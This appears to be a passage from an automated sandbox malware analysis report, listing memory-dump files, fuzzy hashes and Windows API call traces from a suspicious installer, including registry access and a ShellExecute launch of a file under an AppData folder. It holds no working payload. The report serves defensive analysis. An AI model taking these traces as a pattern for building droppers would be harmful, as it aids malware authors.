                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                                              • Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
                                                                                                                                              • Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                                              • Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                                              • Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
                                                                                                                                              • Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                                              • Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 334405425-0
                                                                                                                                              • Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                                              • Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
                                                                                                                                              • Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                                              • Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
                                                                                                                                                • Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                                              • lstrlenW.KERNEL32 ref: 0040222A
                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 00402235
                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1486964399-0
                                                                                                                                              • Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                                              • Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
                                                                                                                                              • Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                                              • Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 167947723-0
                                                                                                                                              • Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                                              • Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
                                                                                                                                              • Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                                              • Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                              APIs
                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?), ref: 00401E52
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00401E3B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto
                                                                                                                                              • API String ID: 587946157-576767988
                                                                                                                                              • Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                                              • Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
                                                                                                                                              • Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                                              • Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                                              • Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
                                                                                                                                              • Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                                              • Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                              • Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                                              • Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
                                                                                                                                              • Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                                              • Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                                              • Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
                                                                                                                                              • Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                                              • Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 849931509-0
                                                                                                                                              • Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                                              • Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
                                                                                                                                              • Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                                              • Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                                • Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                                                • Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
                                                                                                                                                • Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
